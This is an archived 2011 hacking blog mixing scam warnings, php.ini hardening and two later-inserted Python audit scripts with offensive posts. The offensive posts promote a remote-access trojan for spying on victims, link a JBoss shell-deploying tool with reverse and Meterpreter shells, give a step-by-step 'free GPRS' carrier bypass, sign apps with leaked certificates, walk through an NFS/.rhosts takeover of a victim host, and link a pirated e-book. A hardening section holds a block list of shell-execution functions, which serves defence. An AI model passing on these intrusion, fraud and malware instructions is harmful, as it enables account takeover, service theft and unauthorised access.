Apr 30, 2011

The Truth Behind Hacking Facebook Websites - Revealed

FACEBOOK HACKING GENUINE OR SCAM??

When you search the internet for HACKING FACEBOOK ACCOUNTS you come across many websites offering to hack Facebook accounts for $100 or for completing a survey. There is also a lot of free Facebook hacking software available on the internet. All of it is completely fake, and the "tools" can also be backdoored, so the only account that ends up compromised is yours.

http://hacking-facebook.com/
http://www.hackfacebook.org/

I found these two as examples to show you guys.

Now, the first site "hacks" accounts for 100 USD.


"You can pay for our service right after Facebook account is hacked." That is what their website says. So how can they trust us to pay after an account has been hacked??

I can tell you that if at any step they ask you for some personal information, it is a very wise idea to close the website. Instead of hacking someone else's account you will lose your own; this is called social engineering. Using the information you hand over, they can take over your account.

Sometimes they may also tell you to give them your own login details. As mentioned by h4ck0lic bro, this method is called "TROLLING".


OK, now let's talk about the second link.

Hacking accounts without the user's knowledge is itself illegal, so how can they say that hacking using their method is legal?


" * It is 100% FREE due to the massive demand and load on our servers we may soon need to charge a fee, so hurry while the offer lasts.
* It is 100% LEGAL Using this method you can be assured that there is NOTHING ILLEGAL, unlike all other software and methods, Hotmail Password Cracker users 100% legal methods of Hacking Facebook Account passwords
* It is SIMPLE access our gateway and see for yourself! "
^^ they say the above ..

I can say this is a scam to fool you guys: the operator gets the money from the CPA survey he has on his site.

How did I tell this is a scam???

There is a page at

http://www.hackfacebook.org/HackFacebookAccounts.html

For your sake I filled it in and got empty results.

Then I thought I'd go and see what comes next, and I came across a link:

http://www.hackfacebook.org/ThankYou.html (CPA SURVEY HERE )

Now look at the strategy through which they fool us...

We open the main page, which then redirects to the page

http://www.hackfacebook.org/HackFacebookAccounts.html

This is the main thing that convinces people that this site is a pure legit site to hack Facebook.

Further inspection showed that the last page has a CPA survey in it, and the site tells you to complete the survey in order to get access to their "gateway" (whatever that is)...

What will happen then ?

What happens next will make you sad: you will complete the survey, but surprisingly there are no links and no gateways through which you can get passwords. The survey is the product; your time and your data are the payment.


Better not fall into these traps, huh?


WEBOPEDIA - The experts choice

Hacking and security are both related to one thing: THE COMPUTER. Now the computer also has its own way of living..

There are some words in the world of computers which are difficult to understand, like SSID, OEM, WI-FI, OSI, CPU, etc. etc.

It becomes damn difficult to know the meanings when you don't have a dictionary (Oxford doesn't give these meanings).

So now I have a very good dictionary for you guys :)

WeBOpeDia The HacKerS ChoIce

Go here and see it yourself :)

do reply here


Apr 27, 2011

[EASY] Change the Administrator password while logged in to the computer

This tutorial is going to be the easiest and the smallest tutorial ever. I will tell you how to reset/change the password of a computer's administrator account.


For this you need to be logged in to the computer with an account that has administrator rights (the Reset Password button is only available to administrators).

Then go to Run (Win+R) and type control userpasswords2

Now comes the fun part

  • Select the user 
  • Click on Reset Password 
  • And Reset Your Password 

Tutorial finish :D

I will post another good tutorial on password cracking when I have some time.

Apr 25, 2011

Mozilla Easter Eggs

Easter egg means hidden surprise. Software developers knowingly leave some surprises for you; these surprises are called Easter eggs :D


1. Robots
• In the address bar, type: about:robots
• Now watch what happens.
• Click on the "Try Again" button and see something :P

2. Firefox inside Firefox
• Open Firefox
• Enter the following in the address bar: chrome://browser/content/browser.xul

3. Firefox Red Screen
• Open Firefox
• In the address bar type: about:mozilla
• Now see what happens.

4. Kitchen Sink
• Load Firefox
• Enter an address of about:kitchensink
• You can play with the tap

This Easter egg doesn't work with new Firefox browsers.



Hope you liked this ;) 

BodgeIt Store, the vulnerable web application for penetration testers

There are various deliberately vulnerable web applications such as Jarlsberg, WackoPicko, Damn Vulnerable Web Application (DVWA), Vicnum, etc. Now we have another application that is vulnerable and ready to be exploited! The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to penetration testing.

Features
  • Easy to install – just requires java and a servlet engine, e.g. Tomcat
  • Self contained (no additional dependencies other than the 2 in the above line)
  • Easy to change on the fly – all the functionality is implemented in JSPs, so no IDE required
  • Cross platform
  • Open source
  • No separate db to install and configure – it uses an ‘in memory’ db that is automatically (re)initialized on start up
Install
All you need to do is download the zip file and extract it into the webapps directory of your favorite servlet engine.

You may use XAMPP for this: http://www.apachefriends.org/en/xampp-windows.html#522

DOWNLOAD bodgeit.1.1.0.zip

Thank You 



Apr 23, 2011

Making a PHP RAT | VB.NET



What is a RAT?


A RAT (Remote Administration Tool) connects using the standard TCP/IP protocol, as long as the server file is loaded on the target victim's computer. Once this file has been loaded once, the operator at the client end of the tool can modify the registry to cause this file to be started every time Windows starts, ensuring the hacker will always have access to the infected system.

Once access has been established, the hacker has almost complete control over his target. Every file on the system can be renamed, moved, deleted, frozen, changed, replaced, anything you can imagine. WAV files can be played, or played on loop, to annoy the hell out of the receiving end. Video and still images can be captured to keep a log of the computer's visual activity.

In addition to this, the tool allows the hacker to share additional drives over the network, such as floppy or CD drives, allowing the hacker to write files to floppies or open/close the CD-ROM drive.

A more serious tool in the hacker's possession is the ability to log all keystrokes on the infected machine, allowing him to acquire passwords from the system. In addition, it can also acquire cached passwords, such as Windows logon passwords, making the system incredibly vulnerable to attack and vandalism.

Finally, if the hacker is persistent enough, he can prevent the user from removing the tool in a variety of ways, short of disabling the network. Shutting down, locking, and restarting the computer are all options to stop the victim from removing the trojan, unless the network connection is broken.


Watch the VIDEO 


Note: a PHP RAT doesn't need port forwarding.

Credits to - The original makers of this video

Happy Hacking

Apr 22, 2011

The Web Application Hackers Handbook



The Web Application
Hacker’s Handbook

===============================
Discovering and Exploiting Security Flaws



This e-book is one of my favorites.

I am only going to give a brief intro about the book here. The rest you go and read.


This E-book is a practical guide to discovering and exploiting security flaws in web applications. By “web application” we mean an application that is accessed by using a web browser to communicate with a web server. We examine a wide variety of different technologies, such as databases, file systems, and web services, but only in the context in which these are employed by web applications. If you want to learn how to run port scans, attack firewalls, or break into servers in other ways, we suggest you look elsewhere. But if you want to know how to hack into a web application,  steal sensitive data, and perform unauthorized actions, then this is the book for you.

Overview of This Book

The focus of this book is highly practical. While we include sufficient background and theory for you to understand the vulnerabilities that web applications contain, our primary concern is with the tasks and techniques that you need to master in order to break into them. Throughout the book, we spell out the specific steps that you need to take to detect each type of vulnerability, and how to exploit it to perform unauthorized actions. The book also includes real-world examples, derived from the authors' many years of experience, illustrating how different kinds of security flaw manifest themselves in today's web applications. Security awareness is usually a two-edged sword. Just as application developers can benefit from understanding the methods used by attackers, hackers.

Download This E-Book From - HERE 
password for the file - saurav

Happy Hacking

Apr 20, 2011

JBoss Autopwn - JSP Hacking Tool

This JBoss script puts a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.
Features
  • Multiplatform support – tested on Windows, Linux and Mac targets
  • Support for bind and reverse bind shells
  • Meterpreter shells and VNC support for Windows targets
Installation

Requirements:
  • Netcat
  • Curl
  • Metasploit v3, installed in the current path as "framework3"
You can download JBoss Autopwn here:

Download From here





Apr 17, 2011

Change Proxy | Change Your Proxy Using Firefox


♥ I love Proxies ♥

What are proxies?
In computer networks, a proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server evaluates the request according to its filtering rules. For example, it may filter traffic by IP address or protocol. Go here to learn more.

Now on to the topic (changing your proxy)

We change it for anonymity purposes.
Requirements
i) A browser (in my case I am going to use Firefox)
ii) Fresh proxies (not dead or outdated ones)


For proxies I am going to use Hidemyass's proxy lists.

There we can get very fast and updated servers. That is why I ♥ it :D


STEPS

I am now going to use a fast German proxy for this tutorial.




Then go to Tools > Options > Advanced > Network tab > Settings, choose "Manual proxy configuration" and enter the proxy's IP address and port.



Click on OK and you are done :D


Notes:
  • The proxy shown here was only an example; using the one I used may cause malfunctions in your connection.
  • Always use a FRESH proxy.
  • Do select a proxy with good speed and connection time (I suggest using US/UK proxies).
  • Remember that the proxy operator can see all of your unencrypted traffic, so do not log in to anything sensitive through an unknown proxy.
  • After finishing your work, follow the above steps again and click on "Auto-detect proxy settings for this network".
Hope you enjoyed this small tutorial.


Happy Hacking

Wapiti - The Web Vulnerability Scanner

Wapiti allows you to check the security of your web applications.
It performs "black-box" scans, i.e. it does not study the source code of the application but scans the web pages of the deployed webapp, looking for scripts and forms where it can inject data.
Once it has this list, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable.


Vulnerabilities Wapiti Can Detect

  • File handling errors (local and remote include/require, fopen, readfile...)
  • Database injection (PHP/JSP/ASP SQL injections and XPath injections)
  • XSS (Cross Site Scripting) injection
  • LDAP injection
  • Command execution detection (eval(), system(), passthru()...)
  • CRLF injection (HTTP response splitting, session fixation...)
Wapiti is able to differentiate between reflected (one-off) and permanent (stored) XSS vulnerabilities.
Wapiti prints a warning every time it finds a script allowing HTTP uploads.
A warning is also issued when an HTTP 500 code is returned (useful for ASP/IIS).
Wapiti does not rely on a vulnerability database as Nikto does. Wapiti aims to discover unknown vulnerabilities in web applications.
It does not provide a GUI for the moment, so you must use it from a terminal.

 

For More Visit here

Happy Hacking

Installation Tutorial Of Signed Browsers In S60v2 And JAVA Phones

Installation tutorial for S60v2 phones

1. Extract the *.jad and *.jar from the zipped file and transfer them to the c:/nokia/install folder.

2. Go to the phone Menu > Tools > App. Manager.

3. In the App. Manager, click the uninstalled *.jad file to start the offline installation.

4. Follow the installation steps and select the installation drive when asked.

5. IF SUCCESSFUL, THE INSTALLATION WILL COMPLETE!

6. Now, without exiting the App. Manager, find the installed application and, from suite settings, set NETWORK ACCESS, CONNECTIVITY, MULTIMEDIA, READ USER DATA and EDIT USER DATA to ALWAYS ALLOWED. REMEMBER, DO NOT SET APP. AUTO START TO ALWAYS ALLOWED, SINCE IT WILL REVERT NETWORK ACCESS BACK TO "ASK EVERY TIME" (IMPORTANT FOR BROWSERS). ALSO, MESSAGING HAS NO OPTIONS OTHER THAN "NOT ALLOWED" AND "ASK EVERY TIME", SO CHOOSE THE LATTER.

7. Now exit the App. Manager and enjoy your signed Java application!

Tutorial For JAVA Phones

Here I am going to give a tutorial on signing Java applications for Nokia S40 and Sony Ericsson mobiles.
Required apps and cert:

1.) OxyCube (a PC-side mobile media/file browser)


2.) BeHappy (PC app)


3.) CERT

The process is divided into 2 parts:

1. Cert installation
2. Signing of the app

1. Installation of the cert. One thing to note: for Nokia phones we need to use the darkman cert (exp.cer), and for Sony Ericsson phones we need the Mobile-Review cert (halmer.cer).

a.) For Nokia S40: first download OxyCube via a Google search. Install OxyCube on your PC and connect your phone to it. Now go to c:/hiddenfolder/certificates/user/, delete the contents of this folder and paste in the 2 files from the "user exp" folder which I uploaded in the zip file. Now you have installed the darkman cert on your phone. Check on your phone for the exp.cer file in Settings / Security / User certificates / Certificate list. If it exists, you have successfully installed the darkman cert.

b.) For Sony Ericsson: I am not sure about Sony Ericsson. First copy the halmer.cer file from the zip archive and paste it onto your phone. Now click on it and install the cert.

2.) Signing of the app: 2 methods

a.) Off-line signing
b.) On-line signing

a.) For off-line signing of any Java app with the darkman certificate, first install BeHappy on your computer and drag and drop your jar file onto the BeHappy window, or open BeHappy, click on Open and select the jar file. Now a message pops up saying the app is signed. It will create a JAD certificate file for the jar file you used. Now send both the jar and jad files to your phone and select the permissions as "Always allowed".

b.) For on-line signing go to http://simak.ru. This is a Russian site; use the Google-translated version (go here).

Now click on the on-line certifier, select the permissions and phone model, paste the link to your jar file, download both the jar and JAD file and send them to your phone. If you don't have a link to the file you want to sign, first upload your file to a free file-hosting site and get the URL of your file. Paste this URL at simak.ru and sign your application.

Happy signing

By- Saurabh Khare (Mobile Expert)

Aircel Free GPRS Using Handler Browsers | India



Aircel Free GPRS Using Handler Browsers

Hi Aircel user! We have an exclusive free GPRS trick for you.
It has been tested on 3G and 2G. It also works fine when you are roaming.
So to use this new GPRS trick you have to use a handler browser.

What the heck is a handler browser?

Don't cry, I am going to tell you. A browser which lets the phone use custom settings like IP, port, HTTP server, etc. is called a handler browser.


Let's get to work....
First of all, open the handler browser and then select proxy as host (usually the 3rd last option in the handler menu).
Now write "0.facebook.com" there, without the quotes, and you are good to go.

Now enjoy full-fledged GPRS on your Aircel SIM.

We would suggest you use this with as low a balance as possible, because prevention is always better than cure :-D

Ucweb Browser Extreme Mod For This Trick

Download Unsigned

Download Signed

Remember, since it's a signed browser you will need to follow the procedure in this post.

By- Saurabh Khare (MOBILE EXPERT)

Apr 14, 2011

Web Fraud | Internet Scams | Email Scams



Nowadays internet scams and frauds are very popular. Every day everyone is getting an email or SMS from fraudsters whose intention is to loot people. They promise to give you a huge amount of money, and for that they ask for money from you, like "First you have to transfer $100 to our bank account to claim your money".

Here is a scam SMS I got only yesterday:

"your Number have been selected and won 10000$ to claim it contact at clksk@hotmail.com with your details"

SEE AN EXAMPLE OF A SCAM
=========================================================================
Mark <mark2010.2010@rediffmail.com>
to "INFOR@2010.COM" <INFOR@2010.com>
subject GO FOR YOUR WINNING CONTACT US TODAY AT:claim_uk_2010@hotmail.com


GO FOR YOUR WINNING CONTACT US TODAY AT:claim_uk_2010@hotmail.com



CONGRATULATION; YOUR EMAIL ADDRESS HAS WON THE SUM OF 500,000.00 UNITED

KINGDOM GREAT BRITISH POUNDS (GBP) IN THIS ON GOING AWARD WINNING PROMOTION

2010 IN UNITED KINGDOM – LONDON. FOR YOU TO CLAIM YOU’RE WINNING PRIZE

AMOUNT FUNDS SUM OF FIVE HOUNDED THOUSAND UNITED KINGDOM GREAT BRITISH

POUNDS YOU HAVE TO SEND YOU PERSONAL INFORMATION DETAILS BELOW SO THAT THE

YAHOO/MSN AWARD WINNING PROMOTION DEPARTMENT WILL SEND A DIPLOMATIC AGENT

DOWN TO YOUR COUNTRY TO DELIVER YOU WINNING PRIZE PERSON TO YOU AT YOUR

DOOR STEP.


FULL NAME:
COUNTRY:
STATE:
CITY:
ADDRESS:
s3x:
OCCUPATION:
MOBILE NUMBER:
TELEPHONE NUMBER:
A SCAN COPY OF ANY IDENTITY CARD OF YOURS:

PLEASE FILL THIS FORM AND SEND IT BACK TO US SO THAT WE CAN PROCEED FOR

YOUR WINNING PRIZE AMOUNT FUNDS DELIVERING OK ONCE AGAIN CONGRATULATION, WE AWAIT TO HEAR FROM YOU SOON
========================================================================

If you have a brain you will think: WHY WOULD THEY GIVE US SO MUCH MONEY???

There are a number of scams out there... see the list below:

  • Credit Card Scam
  • Loan and Mortgage Scams
  • Job Scams 
  • SMS Scams
  • Lottery Scams 
  • PTC Scams


etc.
I would suggest you visit this website to see the scams in detail.


To be safe and make others aware of these scams, you need to stay alert and never fall prey to them.

The fraudsters use different places for sending different emails, so it becomes very difficult for the local police to catch them. Usually these guys work in a group of more than 5 or 6 people.

PREVENTION METHODS 

  • Check the web address: even if one character is different, it can mean it's a different website.
    ALL INDIAN GOVT. SITES END WITH THE DOMAIN gov.in, e.g. india.gov.in


  • Never enter your private information unless it is a secure site and you know who you are dealing with. Secure and trusted sites show a padlock in the browser window or a secured URL at the beginning of the address (https://). Keep in mind that https only proves the connection is encrypted, not that the site owner is honest, so still check the address itself.
  • If you get such an email, report it to the cyber crime department.
    Indian Cyber Crime Phone Number: 1800 209 6789
    You can report to the Cyber Crime department if you have a case related to cyber stalking, cyber harassment, online harassment, unsolicited calls, pornographic MMS, online fraud, phishing, or even threat mails.


  Have a look at this link too: http://www.consumerfraudreporting.org/

THINGS TO LOOK AT

- Email sent from gmail, yahoo, hotmail or another free webmail address while claiming to be a bank, lottery or government department
- Unsolicited emails from strangers who are advertising a website: do not click on web links in these emails (they may lead to malware)
- Unexpected emails requesting personal information, or emails with generic greetings like 'Dear Customer' instead of your name
- Offers guaranteeing you a job with a very high salary
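The "things to look at" above and the "check the web address" advice in the prevention list can be turned into a small triage script. The following is an added example written for this post, not code from the original, and the three sample messages are constructed (the sender addresses, the trusted-domain list and the free-webmail list are assumptions for the demo). It parses a raw email, pulls out the sender domain, flags senders that are one character away from a trusted domain (the "even if one character is different" rule), and then checks the subject and body for the textual warning signs listed in the post.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Free webmail providers: the post lists mail from these as a warning sign.
FREE_WEBMAIL = {"gmail.com", "yahoo.com", "hotmail.com", "rediffmail.com"}
# Domains the reader actually deals with (hypothetical list for the lookalike check).
TRUSTED_DOMAINS = {"india.gov.in", "examplebank.com"}

# Textual indicators taken from the "things to look at" list.
GENERIC_GREETING = re.compile(r"^\s*(dear\s+(customer|user|winner|friend|sir)\b|congratulation)", re.I | re.M)
PRIZE_WORDS = re.compile(r"\b(won|winning|prize|lottery|award|jackpot)\b", re.I)
PERSONAL_INFO = re.compile(r"\b(full name|mobile number|telephone number|identity card|passport|bank account|password)\b", re.I)
ADVANCE_FEE = re.compile(r"\b(transfer|send|pay)\b.{0,60}?(\$|\busd\b|\bgbp\b|\brupees\b|\bfee\b)", re.I | re.S)
URGENCY = re.compile(r"\b(hurry|today|immediately|urgent|within 24 hours|soon)\b", re.I)


def edit_distance(a, b):
    """Levenshtein distance; catches domains one character away from a trusted one."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def scam_indicators(raw_email):
    """Return the list of warning signs triggered by one RFC 822 message (headers + body)."""
    msg = message_from_string(raw_email)
    domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    body = msg.get_payload()
    text = msg.get("Subject", "") + "\n" + body
    found = []
    if domain in FREE_WEBMAIL:
        found.append("free-webmail-sender")
    for trusted in sorted(TRUSTED_DOMAINS):
        if domain != trusted and edit_distance(domain, trusted) <= 1:
            found.append("lookalike-of:" + trusted)
    if GENERIC_GREETING.search(body):
        found.append("generic-greeting")
    if PRIZE_WORDS.search(text):
        found.append("prize-language")
    if PERSONAL_INFO.search(text):
        found.append("asks-personal-info")
    if ADVANCE_FEE.search(text):
        found.append("advance-fee")
    if URGENCY.search(text):
        found.append("urgency")
    return found


def looks_like_scam(raw_email, threshold=3):
    """Simple decision rule: three or more independent indicators."""
    return len(scam_indicators(raw_email)) >= threshold


# Constructed samples (not real mail): one modelled on the lottery message quoted
# above, one legitimate notification, one sent from a domain one character away
# from india.gov.in.
SCAM_EMAIL = """\
From: Award Dept <promo.dept2010@rediffmail.com>
To: undisclosed-recipients:;
Subject: GO FOR YOUR WINNING CONTACT US TODAY

CONGRATULATION; YOUR EMAIL ADDRESS HAS WON THE SUM OF 500,000.00 GBP.
TO CLAIM YOUR WINNING PRIZE SEND YOUR FULL NAME, MOBILE NUMBER AND A SCAN
COPY OF ANY IDENTITY CARD. FIRST YOU HAVE TO TRANSFER A 100$ PROCESSING FEE.
"""

LEGIT_EMAIL = """\
From: Statements <alerts@examplebank.com>
To: Priya <priya@example.net>
Subject: Your March statement is ready

Dear Priya,
Your statement is available in online banking. No action is needed.
"""

LOOKALIKE_EMAIL = """\
From: Tax Refund <refund@india.qov.in>
To: Priya <priya@example.net>
Subject: Refund waiting

Dear Customer, your refund of Rs. 5000 is waiting.
Send your bank account and password today.
"""

if __name__ == "__main__":
    for name, raw in (("scam", SCAM_EMAIL), ("legit", LEGIT_EMAIL), ("lookalike", LOOKALIKE_EMAIL)):
        print(name, looks_like_scam(raw), scam_indicators(raw))
```

The lookalike check is deliberately limited to distance 1 against a short list of domains you actually deal with; widening either would start flagging unrelated legitimate senders. The keyword rules only score, they never decide on their own, which is why the decision function asks for several independent indicators.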

Earning on the internet is interesting and joyful; you just have to differentiate the genuine from the scam. If not, you are

  THIS IS A BIG ISSUE RUNNING IN ALL THE COUNTRIES..PREVENTION IS THE ONLY WAY


Apr 11, 2011

--- UNIX Attacks ---



In this article I am going to discuss how a Unix-based system gets attacked using LOCAL and REMOTE attacks.

Unix Local Attacks

What does it mean?

When you want to gain root on a file server, one way to start is to gain at least limited access on the system. There are a large number of exploits to "exploit the root", but many require that you have an account on the box. Here is an example:

  • Gain access to server www.saurav.com via guest account 

  • The server is running an older version of Linux

  • Look around on Bugtraq or some other place with exploit code, and find an exploit for one of the outdated or unpatched programs or subsystems.

  • Compile it and run it to become root


How do the exploits work?

There are several different attack techniques you can use from a local account with the handy exploit you are running. Here are a few common ones with simple explanations:

Misconfiguration
If excessive permissions exist on certain directories and files, these can lead to gaining higher levels of access. For example, if /dev/kmem is writable, it is possible to rewrite your UID to match root's. Another example would be a .rhosts file with read/write permissions for everyone, allowing anyone to write to it. Yet another example would be a script launched at startup, from cron, or respawned. If this script is editable, you could add commands to run with the same privileges as whoever started it (for startup rc files, this would be root).
Poor SUID
Sometimes you will find scripts (shell or otherwise) that perform certain tasks and run as root. If a script is writable by your id, you can edit it and run it. For example, we once found a shutdown script that was world writable. By adding a few lines at the beginning of the script it was possible to have the script create a root shell in /tmp.
Buffer Overflow
Buffer overflows are typically used to spawn root shells from a process running as root. A buffer overflow can occur when a program has a buffer for user-defined data and the length of that data is not checked before the program acts upon it. See the next question for more details.
Race Conditions
A Race Condition is when a program creates a short opportunity for evil by opening a small window of vulnerability. For example, a program that alters a sensitive file might use a temporary backup copy of the file during its alteration. If the permissions on that temporary file allow it to be edited, it might be possible to alter it before the program finishes its editing process.
Poor Temp Files
Many programs create temporary files while they run. If a program runs as root and is not careful about where it puts its temp files and what permissions these temp files have, it might be possible to use links to create root-owned files.
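The "Misconfiguration" and "Poor SUID" cases above share one precondition: a file that runs with root's privileges (a startup or cron script, a setuid binary) is writable by an ordinary account. That is easy to audit for, and an administrator who runs the check first removes the easy route. The script below is an added example for this post, not code from the original or from NMRC; it walks a directory tree, reports regular files that are world-writable or carry the setuid/setgid bit, and points out the worst case where both are true. The demo tree it builds (the paths under etc/, usr/ and their modes) is constructed for the example.

```python
import os
import stat
import tempfile


def audit_tree(root):
    """Walk root and report the two local-attack preconditions described above:
    world-writable regular files (any local account can edit them) and files with
    the setuid/setgid bit (they run with the owner's privileges). Symlinks are not
    followed and are ignored, since their mode bits are meaningless."""
    findings = {"world_writable": [], "setuid_setgid": []}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: look at the entry itself, not its target
            if not stat.S_ISREG(st.st_mode):
                continue
            rel = os.path.relpath(path, root)
            if st.st_mode & stat.S_IWOTH:
                findings["world_writable"].append(rel)
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                findings["setuid_setgid"].append(rel)
    for key in findings:
        findings[key].sort()
    return findings


def high_risk(findings):
    """Files that are both privileged and editable by everyone: the 'world-writable
    shutdown script' case from the text."""
    return sorted(set(findings["world_writable"]) & set(findings["setuid_setgid"]))


# Constructed demo layout: relative path -> mode. Mirrors the cases in the text.
DEMO_FILES = {
    "etc/rc.local": 0o777,                 # startup script anyone can edit (Misconfiguration)
    "etc/cron.daily/backup": 0o755,        # cron script with sane permissions
    "usr/local/bin/shutdown.sh": 0o4777,   # setuid AND world-writable (Poor SUID)
    "usr/bin/passwd": 0o4755,              # setuid but not writable: normal, listed for review
}


def build_demo_tree(base):
    """Create the constructed files under base with the modes in DEMO_FILES."""
    for rel, mode in DEMO_FILES.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho demo\n")
        os.chmod(path, mode)  # chmod after writing so the setuid bit is not cleared
    return base


def run_demo():
    """Build the demo tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as base:
        build_demo_tree(base)
        return audit_tree(base)


if __name__ == "__main__":
    result = run_demo()
    print("world-writable:", result["world_writable"])
    print("setuid/setgid: ", result["setuid_setgid"])
    print("HIGH RISK:     ", high_risk(result))
```

On a real host you would point audit_tree at /etc, /usr/local and the cron and init directories and compare the setuid list against what the package manager installed; anything world-writable in those trees, or setuid and not accounted for, is what the "Poor SUID" paragraph is describing.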

Unix Remote Attacks

What are remote attacks ?


A remote hack is when you attack a server you are not logged into. Usually this is done from another server, although in some cases you can do it from your PC (depending on your OS).

Remote hacks come in different forms. Usually exploiting an existing service running on the victim server is the goal. Exporting an NFS mount read/write to anyone might not be a bad thing, but if you can NFS-mount directories containing .rhosts files, then it can be a very bad thing. Also, certain daemons might be subject to remote buffer overflows, allowing someone in a remote location to run arbitrary commands on the victim server.



Here is an example:

  1. You are root on a host named saurav.
  2. You discover the host victim is exporting /home2/old read/writable to the world.
  3. You also discover by fingering various accounts that user fred's home directory is /home2/old/fred and he hasn't logged in for months.
  4. Quickly, you create a fred account on saurav.
  5. Now you mount /home2/old and create an .rhosts file to establish trust with saurav.
  6. After you become fred on saurav, you rlogin to the victim as fred.

References: Wikipedia, NMRC


Happy Hacking

 




Apr 3, 2011

PHP Security | Securing php.ini




php.ini is PHP's default configuration file. On many Linux systems this file is found at /etc/php.ini. It controls a host of functionality that is used to secure web applications, yet many PHP users and admins are unfamiliar with the various options available in php.ini. By tweaking a few security-related options in the file you can strengthen the web applications running on the server.

PHP SAFE MODE
PHP safe mode is a comprehensive "attempt to solve the shared server security problem" that includes many useful features. Safe mode effectively checks that a script and the files it touches have the same ownership. For instance, if you have a page saurav.php that attempts to read the contents of a directory img/, safe mode will check the UID of saurav.php and the img/ directory. If they match then the script will be allowed access; if they don't match then safe mode will deny access. This is an interesting security mechanism that allows you to restrict access by scripts outside of the normal application installation directory. Safe mode may cause problems, though, when the web server ends up owning files (for example, when a new file is uploaded or created by an application it is usually owned by 'apache' or a similar web server account).

Safe mode will also restrict the executables that may be run by scripts, in the same way it restricts file and directory access. Safe mode can also be configured so that only executables in a certain directory can be run. This can help limit the exposure of shell commands to certain scripts.

To enable safe mode, set the safe_mode directive in php.ini to:

safe_mode = On
 
In some cases you'll want to use a group to check ownership. To have safe mode check group permissions use: 
safe_mode_gid = On 

If you want to limit directories that can contain included files or executables use the following php.ini directives respectively: 
 
safe_mode_include_dir = /path/to/dir
safe_mode_exec_dir = /path/to/exec/dir
 
Safe mode has several other useful features that are worth looking into; see the PHP manual to learn more. One caveat: safe mode is deprecated as of PHP 5.3 and removed in PHP 5.4, and it was never a real security boundary, so treat it as a stop-gap on legacy shared hosts and rely on filesystem permissions and the directives below instead.
 
Restricting Includes
 
Using the open_basedir directive in PHP makes a lot of sense given most file include vulnerability vectors. This directive limits all PHP file operations to the listed directory and below. It is common for attackers to search for ways to include local files in PHP scripts to expose local filesystem files through the web server. For instance, if an attacker found a file inclusion vulnerability they might try to include the /etc/passwd file to enumerate all the user accounts on the system. With the open_basedir directive PHP can restrict file inclusion to the web root, for instance /var/www. Once set files outside that directory cannot be included in scripts, and thus the aforementioned attack would fail. To enable the open_basedir directive update your php.ini file to include:
 
open_basedir = /path/to/web/root
   
Disabling Functionality
 
There are certain functions in PHP that you probably don't want your developers to use because of the danger they pose. Even if you know your users aren't utilizing certain functions it is wise to completely disable them so an attacker can't use them. This security precaution is especially effective at stopping an attacker who has somehow managed to upload a PHP script, write one to the filesystem, or even include a remote PHP file. By disabling functionality you ensure that you can limit the effectiveness of these types of attacks. It should be noted that it is virtually impossible to do something like preventing an attacker from executing a command at a shell by disabling functions, but it can certainly stop an attacker who isn't a skillful PHP programmer.

disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abort, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpassthru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo
 

Preventing Information Disclosure

Attackers will often use information that your web server exposes in order to gain information about the server configuration, application layout, and components. Error messages are some of the most common paths to information disclosure, often leaking information such as application installation path, database connectivity, data model details such as table and column names, and script details such as variables. While this debugging information is invaluable to developers it is useless to end users and dangerous to expose to attackers. PHP debugging output should be disabled in the php.ini using:

display_errors = Off
 
This prevents PHP from showing run-time errors in pages served to users. PHP will continue to log the errors as normal, however, so they can be reviewed by developers. Be wary of developer tactics to get around suppressed PHP errors, as disabling this display does not by itself prevent information disclosure: some developers use custom debugging output nested in HTML comments, third-party tools like FirePHP, or write PHP error logs to web-accessible directories using .htaccess files and the error_log directive. Still, by preventing the display of errors by default you reduce the possibility of exposing information to attackers.

Disable Globals

Global variables are a horrible holdover from the PHP 3 days. In most distributions register_globals is set to Off (and thankfully it won't be supported in future versions of PHP). However, you should ensure that the directive is properly in place. You should find the following in your php.ini file:

register_globals = Off
Register globals allows various HTTP variables to be used without specifying their source. For instance, if a developer wants to use a URL variable named 'id', say from the URL request index.php?id=4, with globals on they can simply use $id rather than $_GET['id']. This is a great convenience but it can cause collisions. For instance, if a form post uses a variable called 'id', there is a variable $id defined in the script, and a user alters the URL of the script to include 'id=', which variable has precedence? Even more damaging is the ability of attackers to override configuration variables such as DOCUMENT_ROOT from the URL. This can cause no end of problems, especially if attackers are able to call scripts that are normally included in other scripts and expect predefined variables, which could be overwritten via GET variables by an attacker.
Many legacy applications may require globally registered variables. If this is the case, at least limit the setting to specific application directories rather than your whole PHP installation. You can do this using PHP directives in .htaccess files placed in specific directories. Ensure that register_globals is set to Off in your php.ini configuration, however!

Disable Remote File Includes

Attackers often look for file inclusion vulnerabilities in applications and then use them to include malicious PHP scripts of their own. Even if an attacker has no write access to the web application directories, when remote file inclusion is enabled they can host a malicious PHP script on another server and the web application will fetch it and execute it locally, with devastating consequences. To disable remote file inclusion make sure the following appears in your php.ini file:

allow_url_fopen = Off
allow_url_include = Off
